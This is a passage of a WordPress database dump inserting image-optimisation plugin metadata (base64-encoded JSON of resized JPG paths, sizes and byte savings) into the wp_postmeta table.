3cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0VQSUtVUkUtMzI3MS0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NjkzLCJ0aW1lIjoxNDgzNTUzMDYwLCJpZCI6MTg4MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTMyNzEtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTMyNzEtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9FUElLVVJFLTMyNzEtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjU1NSwidGltZSI6MTQ4MzU1MzA2NCwiaWQiOjE4ODF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjcxLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjcxLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjcxLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo2NDIsInRpbWUiOjE0ODM1NTMwNjcsImlkIjoxODgxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMzI3MS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMzI3MS01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0VQSUtVUkUtMzI3MS01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MTc2MCwidGltZSI6MTQ4MzU1MzA3MCwiaWQiOjE4ODF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTMyNzEtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTMyNzEtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9FUElLVVJFLTMyNzEtMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjYxMSwidGltZSI6MTQ4MzU1MzA3NCwiaWQiOjE4ODF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTMyNzEtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTMyNzEtNDUweDMwMC5qcGciLCJ3aWR0aCI6IjQ1MCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9FUElLVVJFLTMyNzEtNDUweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjk4OSwidGltZSI6MTQ4MzU1MzA3NywiaWQiOjE4ODF9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29068, 1880, 'wpfc_optimisation_reduction', '18059'); 
INSERT INTO `wp_postmeta` VALUES (29069, 1880, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjQ1LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjQ1LmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NTMwODEsImlkIjoiMTg4MCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjQ1LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjQ1LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjQ1LTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo4NzUsInRpbWUiOjE0ODM1NTMwODUsImlkIjoxODgwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMzI0NS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMzI0NS04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0VQSUtVUkUtMzI0NS04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MjIxNSwidGltZSI6MTQ4MzU1MzA4OSwiaWQiOjE4ODB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjQ1LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjQ1LTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjQ1LTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoyMDYyLCJ0aW1lIjoxNDgzNTUzMDkzLCJpZCI6MTg4MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTMyNDUtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjQ1LTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9FUElLVVJFLTMyNDUtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6ODEyNywidGltZSI6MTQ4MzU1MzA5OCwiaWQiOjE4ODB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjQ1LTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjQ1LTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjQ1LTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo2MjcsInRpbWUiOjE0ODM1NTMxMDEsImlkIjoxODgwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMzI0NS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMzI0NS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0VQSUtVUkUtMzI0NS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NDk5LCJ0aW1lIjoxNDgzNTUzMTA0LCJpZCI6MTg4MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTMyNDUtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTMyNDUtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9FUElLVVJFLTMyNDUtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjYxNSwidGltZSI6MTQ4MzU1MzEwNywiaWQiOjE4ODB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjQ1LTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjQ1LTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjQ1LTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxNTgzLCJ0aW1lIjoxNDgzNTUzMTExLCJpZCI6MTg4MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMzI0NS0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMzI0NS0yMjV4MzYwLmpwZyIsIndpZHRoIjoiMjI1IiwiaGVpZ2h0IjoiMzYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0VQSUtVUkUtMzI0NS0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6NjUwLCJ0aW1lIjoxNDgzNTUzMTE1LCJpZCI6MTg4MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMzI0NS00NTB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMzI0NS00NTB4MzAwLmpwZyIsIndpZHRoIjoiNDUwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0VQSUtVUkUtMzI0NS00NTB4MzAwLmpwZyIsInJlZHVjdGlvbiI6ODA2LCJ0aW1lIjoxNDgzNTUzMTE4LCJpZCI6MTg4MH1d'); 
INSERT INTO `wp_postmeta` VALUES (29070, 1879, 'wpfc_optimisation_reduction', '25373'); 
INSERT INTO `wp_postmeta` VALUES (29071, 1879, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjM0LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjM0LmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NTMxMjIsImlkIjoiMTg3OSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjM0LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjM0LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjM0LTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxMDI1LCJ0aW1lIjoxNDgzNTUzMTI2LCJpZCI6MTg3OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTMyMzQtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTMyMzQtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9FUElLVVJFLTMyMzQtODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjMyNTgsInRpbWUiOjE0ODM1NTMxMjksImlkIjoxODc5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMzIzNC03Njh4NTEyLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTEyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMzIzNC03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0VQSUtVUkUtMzIzNC03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6Mjk2OSwidGltZSI6MTQ4MzU1MzEzMiwiaWQiOjE4Nzl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjM0LTE2MDB4MTA2Ny5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMzIzNC0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjM0LTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjEyNTU3LCJ0aW1lIjoxNDgzNTUzMTM2LCJpZCI6MTg3OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTMyMzQtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTMyMzQtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9FUElLVVJFLTMyMzQtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjY1NSwidGltZSI6MTQ4MzU1MzEzOSwiaWQiOjE4Nzl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjM0LTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjM0LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjM0LTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo1MjUsInRpbWUiOjE0ODM1NTMxNDMsImlkIjoxODc5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMzIzNC0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMzIzNC0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0VQSUtVUkUtMzIzNC0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NjMyLCJ0aW1lIjoxNDgzNTUzMTQ2LCJpZCI6MTg3OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTMyMzQtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTMyMzQtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9FUElLVVJFLTMyMzQtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjIwOTAsInRpbWUiOjE0ODM1NTMxNDksImlkIjoxODc5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjM0LTIyNXgzNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjM0LTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjM0LTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjo2MjcsInRpbWUiOjE0ODM1NTMxNTMsImlkIjoxODc5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjM0LTQ1MHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjM0LTQ1MHgzMDAuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjM0LTQ1MHgzMDAuanBnIiwicmVkdWN0aW9uIjoxMDM1LCJ0aW1lIjoxNDgzNTUzMTU2LCJpZCI6MTg3OX1d'); 
INSERT INTO `wp_postmeta` VALUES (29072, 1878, 'wpfc_optimisation_reduction', '24571'); 
